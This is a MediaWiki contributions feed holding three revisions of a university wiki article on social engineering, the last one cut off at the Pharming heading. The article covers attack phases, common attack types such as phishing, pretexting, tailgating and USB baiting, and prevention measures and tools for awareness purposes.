<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=PKraubner</id>
	<title>Elvis Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=PKraubner"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php/Special:Contributions/PKraubner"/>
	<updated>2026-09-10T18:25:05Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14550</id>
		<title>Social Engineering</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14550"/>
		<updated>2024-03-04T18:45:16Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: /* Pharming */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
This documentation contains information of what Social Engineering is, how it is getting used and how to prevent or mitigate some of those attacks. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
In order to execute a social engineering attack you need to understand the basis of social engineering described below. There are also tools to understand and execute these attacks on a practical level. There are many pre-defined attacks which show how easy it is to perform such attacks. You can read more about that in [[Social Engineering Toolkit]]&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
Social engineering is a technique that involves using human interaction to gather information or influence a person to act in a certain way. It can involve spying on someone&#039;s personal life in order to achieve a specific goal, such as manipulating elections, obtaining information, or stealing money. The goal of social engineering is to guide a person towards a particular outcome, often by manipulating their thoughts or actions.&lt;br /&gt;
&lt;br /&gt;
=== Phases ===&lt;br /&gt;
In Social Engineering there are a few necessary steps to complete an attack and gain the information you are after. Kevin Mitnick has divided the process into 4 steps with are mainly: &#039;&#039;&#039;Information Gathering&#039;&#039;&#039;, &#039;&#039;&#039;Hook Relationship&#039;&#039;&#039;, &#039;&#039;&#039;Exploitation and Execution&#039;&#039;&#039; and &#039;&#039;&#039;End without leaving a trace&#039;&#039;&#039;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:01_mitnicks_attack_circle.png|thumb|none|300px|Source: Mouton, Social&lt;br /&gt;
engineering attack framework]]&lt;br /&gt;
&lt;br /&gt;
==== Information Gathering ====&lt;br /&gt;
Information gathering involves collecting as much information as possible about a potential victim in order to identify possible attack vectors. This may include identifying personal details, interests, or vulnerabilities that can be exploited. This information can be gathered through various means, such as social media, public records, or by directly interacting with the victim.&lt;br /&gt;
&lt;br /&gt;
==== Hook Relationship ====&lt;br /&gt;
In order to build a &amp;quot;hook relationship&amp;quot; with the victim, the attacker will often try to present themselves as trustworthy in order to gain the victim&#039;s confidence and cooperation. This may involve pretending to be someone the victim knows, such as a colleague or friend, or posing as an authority figure in order to gain the victim&#039;s trust.&lt;br /&gt;
&lt;br /&gt;
==== Exploitation and Execution ====&lt;br /&gt;
The exploitation and execution phase involves manipulating the victim in order to persuade them to take certain actions or disclose information that the attacker is seeking. This may involve using psychological manipulation or other tactics to influence the victim&#039;s behavior. The attacker may use a variety of tactics, such as flattery, fear, or pressure, in order to persuade the victim to comply with their requests.&lt;br /&gt;
&lt;br /&gt;
==== End without leaving a trace ====&lt;br /&gt;
Once the attacker has achieved their goal, they will often try to cover their tracks and end the attack without leaving any evidence behind. This may involve deleting any records of the attack or disguising their involvement in order to avoid detection. In order to avoid being caught, the attacker may also take steps to destroy any evidence of the attack, such as wiping clean any devices or servers that were used in the attack.&lt;br /&gt;
&lt;br /&gt;
== Attacks ==&lt;br /&gt;
This part contains the most common and basic attacks used today. Nearly everyone should have seen such an attack in practice, either by e.g. receiving a pishing email or getting a warning that pishing emails are circulating with an example. If you have not, just check you Spam or Junk folder in you mailbox you will probably find one in there. &lt;br /&gt;
&lt;br /&gt;
=== Phishing ===&lt;br /&gt;
Phishing Attacks are one of the most common attacks. They are pretty simple and based on for example a real E-Mail that is being copied and used to get user data with links redirecting to a wrong website. This website looks than pretty similar to the original and if you do not look close enough you sometimes do not even realize that it is fake. The goal of this attack is in general to steal password from accounts and then try to steal money in any way possible. There are different types of phishing:&lt;br /&gt;
* Spear phishing: Are attacks on specific people or groups, for this you need to know about the person/company beforehand. Since it is very personal, it is also often very successful in contrast to other Social Engineering approaches. &lt;br /&gt;
* Whaling: Similar to spear-phishing, except that high-profile individuals are targeted.&lt;br /&gt;
* Vishing: These phishing attacks are carried out over the phone.&lt;br /&gt;
* Smishing: The attacks are carried out over text messages.&lt;br /&gt;
* Interactive voice-response phishing: Interactive voice response system is used. &lt;br /&gt;
* Business email compromise phishing: : It is similar to whaling, the attacker wants access to business mails and then sends legitimate looking business mails to get ”normal” employees to click some link or something.&lt;br /&gt;
&lt;br /&gt;
=== Pharming ===&lt;br /&gt;
This approach is similar to the goal of Phishing but is done quite differently. The task is to lure the victim on to a similar looking website e.g. bank, insurance, ... but it is not done with sending you fake links but rather hacking the DNS Server and redirecting you instantly without you even knowing. The domain of the website is completely legit. If the website is done very well your data is being saved and afterwards you are getting redirect onto your real bank account on the real website without you ever knowing.&lt;br /&gt;
&lt;br /&gt;
=== Pretexting ===&lt;br /&gt;
This attack is similar to Phishing but the goal of this attack is to make you believe that you are being contacted by someone close or authoritative. These messages could lead you to send personal information to the attacker. If done right and other conversation were being captured before and the phone number or E-Mail got spoofed you sometimes would not even realize that it is a fake.  &lt;br /&gt;
&lt;br /&gt;
=== Tailgaiting ===&lt;br /&gt;
Tailgaiting is an attack that requires physical access to a secure building. This is achieved by following people through doors or opening you the door by thinking you lost your access card. When done right you get access to a certain level where you could install malware on others PCs. Another ways would be to ask someone for their phone to make a call and then install malware when they are not watching. &lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
[[Ransomware]] is a type of malicious software that encrypts a victim&#039;s personal data and demands a ransom from the victim to restore access to the data. These attacks have been increasing in popularity and are becoming more and more difficult to stop. Some well-known examples of [[Ransomware]] include WannaCry (2017) and Locky (2016). One of the dangers of ransomware is that even if the victim pays the ransom, there is no guarantee that they will actually get their data back.&lt;br /&gt;
&lt;br /&gt;
=== Dumpster Diving ===&lt;br /&gt;
This technique is as the name already tells used to get information out of the trash of others. A letter with sensitive infomation e.g. bank, creditcard or hard drives can contain a lot of data that can be used against you if not disposed properly. A good tip would be throw away pieces of information in different trash cans for example when on the way to work. &lt;br /&gt;
&lt;br /&gt;
=== Pop-Up Window ===&lt;br /&gt;
Pop-Up Windows are often used to scare non enlightened people to get tricked by a simple window mostly in a browser. This scam either wants you to redeem the jackpot you just won or tell you that you computer is infected and you should call the attacker to infect you with malware. Most of the times these windows are hard to close and are pretty loud to intimiated the victim. &lt;br /&gt;
&lt;br /&gt;
=== Baiting/USB Drop ===&lt;br /&gt;
Another bait attack involves the use of dropped USB drives. The attacker will leave a USB drive in a public place, such as a parking lot or lobby, with a label or message that suggests it contains something interesting or valuable. When someone picks up the drive and plugs it into their computer, they may be exposing their system to malware or ransomware.&lt;br /&gt;
&lt;br /&gt;
=== Eavesdropping ===&lt;br /&gt;
Eavesdropping is the act of secretly listening to the private conversations of others without their knowledge. It can be done in a variety of ways, such as through the use of hidden microphones, wiretapping, or simply by listening in on a conversation that is happening nearby. Eavesdropping can be a serious invasion of privacy and is often illegal, particularly if it is done for malicious purposes such as to gather personal or sensitive information. In the digital age, eavesdropping can also be done remotely through the use of malware or other cyber threats that allow an attacker to access and monitor the conversations of their victims.&lt;br /&gt;
&lt;br /&gt;
=== Reverse Social Engineering ===&lt;br /&gt;
One common technique used in reverse social engineering attacks is for the attacker to pretend to be a good guy or authority figure in order to gain the victim&#039;s trust. For example, the attacker might pretend to be a technical support representative and ask the victim for their login credentials in order to &amp;quot;fix&amp;quot; a problem with their computer. Or, the attacker might pose as a law enforcement officer and request that the victim provide sensitive information in order to &amp;quot;assist with an investigation.&amp;quot; In these cases, the victim may feel pressure to comply with the request, believing that they are helping to solve a problem or protect against a threat.&lt;br /&gt;
&lt;br /&gt;
=== Impersonating ===&lt;br /&gt;
Impersonating is the act of pretending to be someone else, either in person or online, in order to deceive others. This can be done for a variety of reasons, such as to gain access to sensitive information or resources, to evade detection or consequences, or to commit a crime. In the digital world, impersonation is often done through the use of fake profiles or websites that mimic legitimate ones in order to trick people into divulging personal information or money. In person, impersonation can be more complex and may involve the use of props, costumes, and other means of disguising one&#039;s true identity.&lt;br /&gt;
&lt;br /&gt;
== Prevention ==&lt;br /&gt;
As attacks increase and improve it is very hard to defend against those if you do not know how they work and what they do. To prevent or mitigate such attacks you need 3 important informations.&lt;br /&gt;
&lt;br /&gt;
=== Clarify Attacks ===&lt;br /&gt;
The first part help you to understand how and what these attacks are trying to do. If you know what a Pop-Up Window is and you now know that these messages are spam and trying to lure you into a trap you will not fall for it anymore. The best way is know examples of the most common attacks to obtainer awareness againts those social engineering attacks. Since these attacks improve over time you should be up-to-date and you should ask people you trust for help if you do not know how to proceed. &lt;br /&gt;
&lt;br /&gt;
=== Education and Training ===&lt;br /&gt;
To ensure the safety and security of your employees, it is important to provide regular training sessions to keep them informed on best practices and current threats. They should be cautious when receiving phone calls or emails from unknown sources, and verify the identity of the sender before disclosing any confidential information. They should also be wary of suspicious links or attachments, and avoid downloading unknown files. To further protect against potential threats, it is advisable to implement multifactor authentication and regularly update antivirus and antimalware programs. Additionally, it is important to carefully examine the references of any offers or requests for sensitive data.&lt;br /&gt;
&lt;br /&gt;
=== Set Security Standards ===&lt;br /&gt;
You should start setting yourself a certain security standard. This goes from checking certain programs or files you do not know to check links before you click them. If you have a new contact in your mailbox you should double check the sender to know for you sure you are not dealing with a scam artist. You should also never share you PC with other or plug-in strange devices you do not know. An increased awareness about pishing emails from providers would be appreciative to check bills if they are not infected with malware. &lt;br /&gt;
&lt;br /&gt;
=== Implement Security Tools ===&lt;br /&gt;
Since detecting malware is getting more difficult everytime you should start using certain tools to help you secure you environment. To protect against more advanced attacks, it is recommended that companies use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS), which can detect and respond to attacks in real-time. In addition to a firewall, companies can also use Virtual Private Networks (VPNs) to secure their internet connection. Anti-phishing tools can help to block and blacklist phishing websites, and companies can also consider using honeypot emails as a way to lure and track attackers. It is also important to implement physical security measures, such as properly securing hardware and following guidelines for physical access to facilities. These tools will help you to detect unwanted programs and helps you safeing your data externally. &lt;br /&gt;
&lt;br /&gt;
* Anti Virus Software: [https://www.malwarebytes.com/ Malwarebytes]&lt;br /&gt;
* Browser Anti-Ad/Spam Plugin: [https://ublockorigin.com/ uBlock Origin]&lt;br /&gt;
* Check E-Mail periodically: [https://haveibeenpwned.com/ HaveIBeenPwned]&lt;br /&gt;
* Safe File externally: [https://nextcloud.com/ Nextcloud]&lt;br /&gt;
* Check Programs: [https://www.virustotal.com/ Virustotal]&lt;br /&gt;
* Password Manager: [https://keepassxc.org/ KeepassXC]&lt;br /&gt;
&lt;br /&gt;
== Social Media Intelligence ==&lt;br /&gt;
&lt;br /&gt;
Social media intelligence (SOCMINT) is a process that involves gathering and analyzing data from social media platforms in order to inform business decisions. This type of intelligence can be used to track brand mentions and sentiment, monitor competitors, and identify emerging trends or opportunities for engagement.&lt;br /&gt;
&lt;br /&gt;
By collecting and analyzing social media data, companies can gain valuable insights into the perceptions and behaviors of their customers and target audience. This can inform marketing strategies, customer service efforts, and product development. For example, a company might use social media intelligence to identify common customer pain points and develop solutions to address them, or to identify influencers to partner with in order to promote their brand.&lt;br /&gt;
&lt;br /&gt;
There are a number of tools and platforms available to help companies automate the process of gathering and analyzing social media data. These tools often include features such as keyword tracking, sentiment analysis, and competitor analysis.&lt;br /&gt;
&lt;br /&gt;
Overall, social media intelligence can be an important part of a company&#039;s market research and customer insights efforts, helping them to better understand and connect with their audience on social media. It can also be a useful way for companies to stay up-to-date on industry developments and emerging trends, and to identify opportunities for growth and innovation.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.sciencedirect.com/science/article/abs/pii/S2214212614001343?via%3Dihub&lt;br /&gt;
* https://link.springer.com/chapter/10.1007/978-3-642-22424-9_4&lt;br /&gt;
* https://www.mdpi.com/1999-5903/11/4/89&lt;br /&gt;
* https://www.researchgate.net/profile/Hugo-Barbosa/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY/links/599c43430f7e9b892bafc0df/SOCIAL-ENGINEERING-AND-CYBER-SECURITY.pdf&lt;br /&gt;
* https://cybernews.com/cyber-war/influencing-anonymous-experiment/&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14549</id>
		<title>Social Engineering</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14549"/>
		<updated>2024-03-04T18:44:13Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: /* Pharming */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
This documentation contains information of what Social Engineering is, how it is getting used and how to prevent or mitigate some of those attacks. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
In order to execute a social engineering attack you need to understand the basis of social engineering described below. There are also tools to understand and execute these attacks on a practical level. There are many pre-defined attacks which show how easy it is to perform such attacks. You can read more about that in [[Social Engineering Toolkit]]&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
Social engineering is a technique that involves using human interaction to gather information or influence a person to act in a certain way. It can involve spying on someone&#039;s personal life in order to achieve a specific goal, such as manipulating elections, obtaining information, or stealing money. The goal of social engineering is to guide a person towards a particular outcome, often by manipulating their thoughts or actions.&lt;br /&gt;
&lt;br /&gt;
=== Phases ===&lt;br /&gt;
In Social Engineering there are a few necessary steps to complete an attack and gain the information you are after. Kevin Mitnick has divided the process into 4 steps with are mainly: &#039;&#039;&#039;Information Gathering&#039;&#039;&#039;, &#039;&#039;&#039;Hook Relationship&#039;&#039;&#039;, &#039;&#039;&#039;Exploitation and Execution&#039;&#039;&#039; and &#039;&#039;&#039;End without leaving a trace&#039;&#039;&#039;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:01_mitnicks_attack_circle.png|thumb|none|300px|Source: Mouton, Social&lt;br /&gt;
engineering attack framework]]&lt;br /&gt;
&lt;br /&gt;
==== Information Gathering ====&lt;br /&gt;
Information gathering involves collecting as much information as possible about a potential victim in order to identify possible attack vectors. This may include identifying personal details, interests, or vulnerabilities that can be exploited. This information can be gathered through various means, such as social media, public records, or by directly interacting with the victim.&lt;br /&gt;
&lt;br /&gt;
==== Hook Relationship ====&lt;br /&gt;
In order to build a &amp;quot;hook relationship&amp;quot; with the victim, the attacker will often try to present themselves as trustworthy in order to gain the victim&#039;s confidence and cooperation. This may involve pretending to be someone the victim knows, such as a colleague or friend, or posing as an authority figure in order to gain the victim&#039;s trust.&lt;br /&gt;
&lt;br /&gt;
==== Exploitation and Execution ====&lt;br /&gt;
The exploitation and execution phase involves manipulating the victim in order to persuade them to take certain actions or disclose information that the attacker is seeking. This may involve using psychological manipulation or other tactics to influence the victim&#039;s behavior. The attacker may use a variety of tactics, such as flattery, fear, or pressure, in order to persuade the victim to comply with their requests.&lt;br /&gt;
&lt;br /&gt;
==== End without leaving a trace ====&lt;br /&gt;
Once the attacker has achieved their goal, they will often try to cover their tracks and end the attack without leaving any evidence behind. This may involve deleting any records of the attack or disguising their involvement in order to avoid detection. In order to avoid being caught, the attacker may also take steps to destroy any evidence of the attack, such as wiping clean any devices or servers that were used in the attack.&lt;br /&gt;
&lt;br /&gt;
== Attacks ==&lt;br /&gt;
This part contains the most common and basic attacks used today. Nearly everyone should have seen such an attack in practice, either by e.g. receiving a pishing email or getting a warning that pishing emails are circulating with an example. If you have not, just check you Spam or Junk folder in you mailbox you will probably find one in there. &lt;br /&gt;
&lt;br /&gt;
=== Phishing ===&lt;br /&gt;
Phishing Attacks are one of the most common attacks. They are pretty simple and based on for example a real E-Mail that is being copied and used to get user data with links redirecting to a wrong website. This website looks than pretty similar to the original and if you do not look close enough you sometimes do not even realize that it is fake. The goal of this attack is in general to steal password from accounts and then try to steal money in any way possible. There are different types of phishing:&lt;br /&gt;
* Spear phishing: Are attacks on specific people or groups, for this you need to know about the person/company beforehand. Since it is very personal, it is also often very successful in contrast to other Social Engineering approaches. &lt;br /&gt;
* Whaling: Similar to spear-phishing, except that high-profile individuals are targeted.&lt;br /&gt;
* Vishing: These phishing attacks are carried out over the phone.&lt;br /&gt;
* Smishing: The attacks are carried out over text messages.&lt;br /&gt;
* Interactive voice-response phishing: Interactive voice response system is used. &lt;br /&gt;
* Business email compromise phishing: : It is similar to whaling, the attacker wants access to business mails and then sends legitimate looking business mails to get ”normal” employees to click some link or something.&lt;br /&gt;
&lt;br /&gt;
=== Pharming ===&lt;br /&gt;
This approach is similar to the goal of Phishing but is done quite differently. The task is to lure the vicitm on to a similar looking website e.g. bank, insurance, ... but it is not done with sending you fake links but rather hacking the DNS Server and redirecting you instantly without you even knowing. The domain of the website is completely legit. If the website is done very well your data is being saved and afterwards you are getting redirect onto your real bank account on the real website without you ever knowing.&lt;br /&gt;
&lt;br /&gt;
=== Pretexting ===&lt;br /&gt;
This attack is similar to Phishing but the goal of this attack is to make you believe that you are being contacted by someone close or authoritative. These messages could lead you to send personal information to the attacker. If done right and other conversation were being captured before and the phone number or E-Mail got spoofed you sometimes would not even realize that it is a fake.  &lt;br /&gt;
&lt;br /&gt;
=== Tailgaiting ===&lt;br /&gt;
Tailgaiting is an attack that requires physical access to a secure building. This is achieved by following people through doors or opening you the door by thinking you lost your access card. When done right you get access to a certain level where you could install malware on others PCs. Another ways would be to ask someone for their phone to make a call and then install malware when they are not watching. &lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
[[Ransomware]] is a type of malicious software that encrypts a victim&#039;s personal data and demands a ransom from the victim to restore access to the data. These attacks have been increasing in popularity and are becoming more and more difficult to stop. Some well-known examples of [[Ransomware]] include WannaCry (2017) and Locky (2016). One of the dangers of ransomware is that even if the victim pays the ransom, there is no guarantee that they will actually get their data back.&lt;br /&gt;
&lt;br /&gt;
=== Dumpster Diving ===&lt;br /&gt;
This technique is as the name already tells used to get information out of the trash of others. A letter with sensitive infomation e.g. bank, creditcard or hard drives can contain a lot of data that can be used against you if not disposed properly. A good tip would be throw away pieces of information in different trash cans for example when on the way to work. &lt;br /&gt;
&lt;br /&gt;
=== Pop-Up Window ===&lt;br /&gt;
Pop-Up Windows are often used to scare non enlightened people to get tricked by a simple window mostly in a browser. This scam either wants you to redeem the jackpot you just won or tell you that you computer is infected and you should call the attacker to infect you with malware. Most of the times these windows are hard to close and are pretty loud to intimiated the victim. &lt;br /&gt;
&lt;br /&gt;
=== Baiting/USB Drop ===&lt;br /&gt;
Another bait attack involves the use of dropped USB drives. The attacker will leave a USB drive in a public place, such as a parking lot or lobby, with a label or message that suggests it contains something interesting or valuable. When someone picks up the drive and plugs it into their computer, they may be exposing their system to malware or ransomware.&lt;br /&gt;
&lt;br /&gt;
=== Eavesdropping ===&lt;br /&gt;
Eavesdropping is the act of secretly listening to the private conversations of others without their knowledge. It can be done in a variety of ways, such as through the use of hidden microphones, wiretapping, or simply by listening in on a conversation that is happening nearby. Eavesdropping can be a serious invasion of privacy and is often illegal, particularly if it is done for malicious purposes such as to gather personal or sensitive information. In the digital age, eavesdropping can also be done remotely through the use of malware or other cyber threats that allow an attacker to access and monitor the conversations of their victims.&lt;br /&gt;
&lt;br /&gt;
=== Reverse Social Engineering ===&lt;br /&gt;
One common technique used in reverse social engineering attacks is for the attacker to pretend to be a good guy or authority figure in order to gain the victim&#039;s trust. For example, the attacker might pretend to be a technical support representative and ask the victim for their login credentials in order to &amp;quot;fix&amp;quot; a problem with their computer. Or, the attacker might pose as a law enforcement officer and request that the victim provide sensitive information in order to &amp;quot;assist with an investigation.&amp;quot; In these cases, the victim may feel pressure to comply with the request, believing that they are helping to solve a problem or protect against a threat.&lt;br /&gt;
&lt;br /&gt;
=== Impersonating ===&lt;br /&gt;
Impersonating is the act of pretending to be someone else, either in person or online, in order to deceive others. This can be done for a variety of reasons, such as to gain access to sensitive information or resources, to evade detection or consequences, or to commit a crime. In the digital world, impersonation is often done through the use of fake profiles or websites that mimic legitimate ones in order to trick people into divulging personal information or money. In person, impersonation can be more complex and may involve the use of props, costumes, and other means of disguising one&#039;s true identity.&lt;br /&gt;
&lt;br /&gt;
== Prevention ==&lt;br /&gt;
As attacks increase and improve it is very hard to defend against those if you do not know how they work and what they do. To prevent or mitigate such attacks you need 3 important informations.&lt;br /&gt;
&lt;br /&gt;
=== Clarify Attacks ===&lt;br /&gt;
The first part help you to understand how and what these attacks are trying to do. If you know what a Pop-Up Window is and you now know that these messages are spam and trying to lure you into a trap you will not fall for it anymore. The best way is know examples of the most common attacks to obtainer awareness againts those social engineering attacks. Since these attacks improve over time you should be up-to-date and you should ask people you trust for help if you do not know how to proceed. &lt;br /&gt;
&lt;br /&gt;
=== Education and Training ===&lt;br /&gt;
To ensure the safety and security of your employees, it is important to provide regular training sessions to keep them informed on best practices and current threats. They should be cautious when receiving phone calls or emails from unknown sources, and verify the identity of the sender before disclosing any confidential information. They should also be wary of suspicious links or attachments, and avoid downloading unknown files. To further protect against potential threats, it is advisable to implement multifactor authentication and regularly update antivirus and antimalware programs. Additionally, it is important to carefully examine the references of any offers or requests for sensitive data.&lt;br /&gt;
&lt;br /&gt;
=== Set Security Standards ===&lt;br /&gt;
You should start setting yourself a certain security standard. This goes from checking certain programs or files you do not know to check links before you click them. If you have a new contact in your mailbox you should double check the sender to know for you sure you are not dealing with a scam artist. You should also never share you PC with other or plug-in strange devices you do not know. An increased awareness about pishing emails from providers would be appreciative to check bills if they are not infected with malware. &lt;br /&gt;
&lt;br /&gt;
=== Implement Security Tools ===&lt;br /&gt;
Since detecting malware is getting more difficult everytime you should start using certain tools to help you secure you environment. To protect against more advanced attacks, it is recommended that companies use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS), which can detect and respond to attacks in real-time. In addition to a firewall, companies can also use Virtual Private Networks (VPNs) to secure their internet connection. Anti-phishing tools can help to block and blacklist phishing websites, and companies can also consider using honeypot emails as a way to lure and track attackers. It is also important to implement physical security measures, such as properly securing hardware and following guidelines for physical access to facilities. These tools will help you to detect unwanted programs and helps you safeing your data externally. &lt;br /&gt;
&lt;br /&gt;
* Anti Virus Software: [https://www.malwarebytes.com/ Malwarebytes]&lt;br /&gt;
* Browser Anti-Ad/Spam Plugin: [https://ublockorigin.com/ uBlock Origin]&lt;br /&gt;
* Check E-Mail periodically: [https://haveibeenpwned.com/ HaveIBeenPwned]&lt;br /&gt;
* Safe File externally: [https://nextcloud.com/ Nextcloud]&lt;br /&gt;
* Check Programs: [https://www.virustotal.com/ Virustotal]&lt;br /&gt;
* Password Manager: [https://keepassxc.org/ KeepassXC]&lt;br /&gt;
&lt;br /&gt;
== Social Media Intelligence ==&lt;br /&gt;
&lt;br /&gt;
Social media intelligence (SOCMINT) is a process that involves gathering and analyzing data from social media platforms in order to inform business decisions. This type of intelligence can be used to track brand mentions and sentiment, monitor competitors, and identify emerging trends or opportunities for engagement.&lt;br /&gt;
&lt;br /&gt;
By collecting and analyzing social media data, companies can gain valuable insights into the perceptions and behaviors of their customers and target audience. This can inform marketing strategies, customer service efforts, and product development. For example, a company might use social media intelligence to identify common customer pain points and develop solutions to address them, or to identify influencers to partner with in order to promote their brand.&lt;br /&gt;
&lt;br /&gt;
There are a number of tools and platforms available to help companies automate the process of gathering and analyzing social media data. These tools often include features such as keyword tracking, sentiment analysis, and competitor analysis.&lt;br /&gt;
&lt;br /&gt;
Overall, social media intelligence can be an important part of a company&#039;s market research and customer insights efforts, helping them to better understand and connect with their audience on social media. It can also be a useful way for companies to stay up-to-date on industry developments and emerging trends, and to identify opportunities for growth and innovation.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.sciencedirect.com/science/article/abs/pii/S2214212614001343?via%3Dihub&lt;br /&gt;
* https://link.springer.com/chapter/10.1007/978-3-642-22424-9_4&lt;br /&gt;
* https://www.mdpi.com/1999-5903/11/4/89&lt;br /&gt;
* https://www.researchgate.net/profile/Hugo-Barbosa/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY/links/599c43430f7e9b892bafc0df/SOCIAL-ENGINEERING-AND-CYBER-SECURITY.pdf&lt;br /&gt;
* https://cybernews.com/cyber-war/influencing-anonymous-experiment/&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14548</id>
		<title>Social Engineering</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14548"/>
		<updated>2024-03-04T18:43:53Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: rearranged Pharming after Phishing, typo fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
This documentation contains information of what Social Engineering is, how it is getting used and how to prevent or mitigate some of those attacks. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
In order to execute a social engineering attack you need to understand the basis of social engineering described below. There are also tools to understand and execute these attacks on a practical level. There are many pre-defined attacks which show how easy it is to perform such attacks. You can read more about that in [[Social Engineering Toolkit]]&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
Social engineering is a technique that involves using human interaction to gather information or influence a person to act in a certain way. It can involve spying on someone&#039;s personal life in order to achieve a specific goal, such as manipulating elections, obtaining information, or stealing money. The goal of social engineering is to guide a person towards a particular outcome, often by manipulating their thoughts or actions.&lt;br /&gt;
&lt;br /&gt;
=== Phases ===&lt;br /&gt;
In Social Engineering there are a few necessary steps to complete an attack and gain the information you are after. Kevin Mitnick has divided the process into 4 steps with are mainly: &#039;&#039;&#039;Information Gathering&#039;&#039;&#039;, &#039;&#039;&#039;Hook Relationship&#039;&#039;&#039;, &#039;&#039;&#039;Exploitation and Execution&#039;&#039;&#039; and &#039;&#039;&#039;End without leaving a trace&#039;&#039;&#039;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:01_mitnicks_attack_circle.png|thumb|none|300px|Source: Mouton, Social&lt;br /&gt;
engineering attack framework]]&lt;br /&gt;
&lt;br /&gt;
==== Information Gathering ====&lt;br /&gt;
Information gathering involves collecting as much information as possible about a potential victim in order to identify possible attack vectors. This may include identifying personal details, interests, or vulnerabilities that can be exploited. This information can be gathered through various means, such as social media, public records, or by directly interacting with the victim.&lt;br /&gt;
&lt;br /&gt;
==== Hook Relationship ====&lt;br /&gt;
In order to build a &amp;quot;hook relationship&amp;quot; with the victim, the attacker will often try to present themselves as trustworthy in order to gain the victim&#039;s confidence and cooperation. This may involve pretending to be someone the victim knows, such as a colleague or friend, or posing as an authority figure in order to gain the victim&#039;s trust.&lt;br /&gt;
&lt;br /&gt;
==== Exploitation and Execution ====&lt;br /&gt;
The exploitation and execution phase involves manipulating the victim in order to persuade them to take certain actions or disclose information that the attacker is seeking. This may involve using psychological manipulation or other tactics to influence the victim&#039;s behavior. The attacker may use a variety of tactics, such as flattery, fear, or pressure, in order to persuade the victim to comply with their requests.&lt;br /&gt;
&lt;br /&gt;
==== End without leaving a trace ====&lt;br /&gt;
Once the attacker has achieved their goal, they will often try to cover their tracks and end the attack without leaving any evidence behind. This may involve deleting any records of the attack or disguising their involvement in order to avoid detection. In order to avoid being caught, the attacker may also take steps to destroy any evidence of the attack, such as wiping clean any devices or servers that were used in the attack.&lt;br /&gt;
&lt;br /&gt;
== Attacks ==&lt;br /&gt;
This part contains the most common and basic attacks used today. Nearly everyone should have seen such an attack in practice, either by e.g. receiving a pishing email or getting a warning that pishing emails are circulating with an example. If you have not, just check you Spam or Junk folder in you mailbox you will probably find one in there. &lt;br /&gt;
&lt;br /&gt;
=== Phishing ===&lt;br /&gt;
Phishing Attacks are one of the most common attacks. They are pretty simple and based on for example a real E-Mail that is being copied and used to get user data with links redirecting to a wrong website. This website looks than pretty similar to the original and if you do not look close enough you sometimes do not even realize that it is fake. The goal of this attack is in general to steal password from accounts and then try to steal money in any way possible. There are different types of phishing:&lt;br /&gt;
* Spear phishing: Are attacks on specific people or groups, for this you need to know about the person/company beforehand. Since it is very personal, it is also often very successful in contrast to other Social Engineering approaches. &lt;br /&gt;
* Whaling: Similar to spear-phishing, except that high-profile individuals are targeted.&lt;br /&gt;
* Vishing: These phishing attacks are carried out over the phone.&lt;br /&gt;
* Smishing: The attacks are carried out over text messages.&lt;br /&gt;
* Interactive voice-response phishing: Interactive voice response system is used. &lt;br /&gt;
* Business email compromise phishing: : It is similar to whaling, the attacker wants access to business mails and then sends legitimate looking business mails to get ”normal” employees to click some link or something.&lt;br /&gt;
&lt;br /&gt;
=== Pharming ===&lt;br /&gt;
